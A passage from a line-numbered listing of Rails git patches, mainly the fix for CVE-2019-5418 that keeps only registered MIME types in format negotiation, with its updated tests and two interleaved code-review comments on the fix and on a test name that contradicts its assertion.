152 |
153 | diff --git a/railties/test/isolation/abstract_unit.rb b/railties/test/isolation/abstract_unit.rb
154 | index 6568a356d6..fe850d45ec 100644
155 | --- a/railties/test/isolation/abstract_unit.rb
156 | +++ b/railties/test/isolation/abstract_unit.rb
157 | @@ -155,6 +155,7 @@ def self.name; "RailtiesTestApp"; end
158 | @app.config.active_support.deprecation = :log
159 | @app.config.active_support.test_order = :random
160 | @app.config.log_level = :info
161 | + @app.secrets.secret_key_base = "b3c631c314c0bbca50c1b2843150fe33"
162 |
163 | yield @app if block_given?
164 | @app.initialize!
165 | --
166 | 2.21.0
167 | ```
168 |
169 | Fix of **CVE-2019-5418**
170 | ```diff
171 | From d7fac9c09a535ec7f11bb9aa8addb4af37b7d4b5 Mon Sep 17 00:00:00 2001
172 | From: John Hawthorn
173 | Date: Mon, 4 Mar 2019 18:24:51 -0800
174 | Subject: [PATCH] Only accept formats from registered mime types
175 |
176 | [CVE-2019-5418]
177 | [CVE-2019-5419]
178 | ---
179 | .../lib/action_dispatch/http/mime_negotiation.rb | 5 +++++
180 | actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
181 | .../new_base/content_negotiation_test.rb | 14 ++++++++++++--
182 | 3 files changed, 23 insertions(+), 6 deletions(-)
183 |
184 | diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
185 | index d7435fa8df..ada52adfeb 100644
186 | --- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
187 | +++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
188 |
@@ -74,6 +74,11 @@ def formats
189 | else
190 | [Mime[:html]]
191 | end
192 | +
193 | + v = v.select do |format|
194 | + format.symbol || format.ref == "*/*"
195 | + end
196 | +
197 | set_header k, v
198 | end
199 | end
200 | diff --git a/actionpack/test/controller/mime/respond_to_test.rb b/actionpack/test/controller/mime/respond_to_test.rb
201 | index f9ffd5f54c..a80cef83b7 100644
202 | --- a/actionpack/test/controller/mime/respond_to_test.rb
203 | +++ b/actionpack/test/controller/mime/respond_to_test.rb
204 | @@ -105,7 +105,7 @@ def made_for_content_type
205 | def custom_type_handling
206 | respond_to do |type|
207 | type.html { render body: "HTML" }
208 | - type.custom("application/crazy-xml") { render body: "Crazy XML" }
209 | + type.custom("application/fancy-xml") { render body: "Fancy XML" }
210 | type.all { render body: "Nothing" }
211 | end
212 | end
213 | @@ -294,12 +294,14 @@ def setup
214 | @request.host = "www.example.com"
215 | Mime::Type.register_alias("text/html", :iphone)
216 | Mime::Type.register("text/x-mobile", :mobile)
217 | + Mime::Type.register("application/fancy-xml", :fancy_xml)
218 | end
219 |
220 | def teardown
221 | super
222 | Mime::Type.unregister(:iphone)
223 | Mime::Type.unregister(:mobile)
224 | + Mime::Type.unregister(:fancy_xml)
225 | end
226 |
227 | def test_html
228 | @@ -455,10 +457,10 @@ def test_synonyms
229 | end
230 |
231 | def test_custom_types
232 | - @request.accept = "application/crazy-xml"
233 | + @request.accept = "application/fancy-xml"
234 | get :custom_type_handling
235 | - assert_equal "application/crazy-xml", @response.content_type
236 | - assert_equal "Crazy XML", @response.body
237 | + assert_equal "application/fancy-xml", @response.content_type
238 | + assert_equal "Fancy XML", @response.body
239 |
240 | @request.accept = "text/html"
241 | get :custom_type_handling
242 |
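Review bot: The added filter `v = v.select do |format| format.symbol || format.ref == "*/*" end` carries the whole security fix of this commit, yet nothing in the code says why unregistered types are dropped, so a later reader of `formats` will not know the line is load-bearing. Suggest a comment above it such as `# Keep only types registered with Mime::Type (plus the */* wildcard): an unregistered Accept/format value must not influence template lookup.`, and as a style point the single-expression block reads better as `v = v.select { |format| format.symbol || format.ref == "*/*" }`. The enclosing formats method starts and ends outside the hunk.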
diff --git a/actionpack/test/controller/new_base/content_negotiation_test.rb b/actionpack/test/controller/new_base/content_negotiation_test.rb
243 | index 7205e90176..6de91c57b7 100644
244 | --- a/actionpack/test/controller/new_base/content_negotiation_test.rb
245 | +++ b/actionpack/test/controller/new_base/content_negotiation_test.rb
246 | @@ -20,9 +20,19 @@ def all
247 | assert_body "Hello world */*!"
248 | end
249 |
250 | - test "Not all mimes are converted to symbol" do
251 | + test "A js or */* Accept header will return HTML" do
252 | + get "/content_negotiation/basic/hello", headers: { "HTTP_ACCEPT" => "text/javascript, */*" }
253 | + assert_body "Hello world text/html!"
254 | + end
255 | +
256 | + test "A js or */* Accept header on xhr will return HTML" do
257 | + get "/content_negotiation/basic/hello", headers: { "HTTP_ACCEPT" => "text/javascript, */*" }, xhr: true
258 | + assert_body "Hello world text/javascript!"
259 | + end
260 | +
261 | + test "Unregistered mimes are ignored" do
262 | get "/content_negotiation/basic/all", headers: { "HTTP_ACCEPT" => "text/plain, mime/another" }
263 | - assert_body '[:text, "mime/another"]'
264 | + assert_body '[:text]'
265 | end
266 | end
267 | end
268 | --
269 | 2.21.0
270 | ```
271 | --------------------------------------------------------------------------------
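Review bot: The name of the new test "A js or */* Accept header on xhr will return HTML" contradicts its own assertion, which expects `Hello world text/javascript!`. If the xhr case is meant to negotiate JavaScript, rename it `test "A js or */* Accept header on xhr will return JS" do`; if HTML really is the intended outcome, the assertion is the wrong one. Whether the xhr branch selects text/javascript cannot be confirmed from this hunk, since the controller under test is outside it.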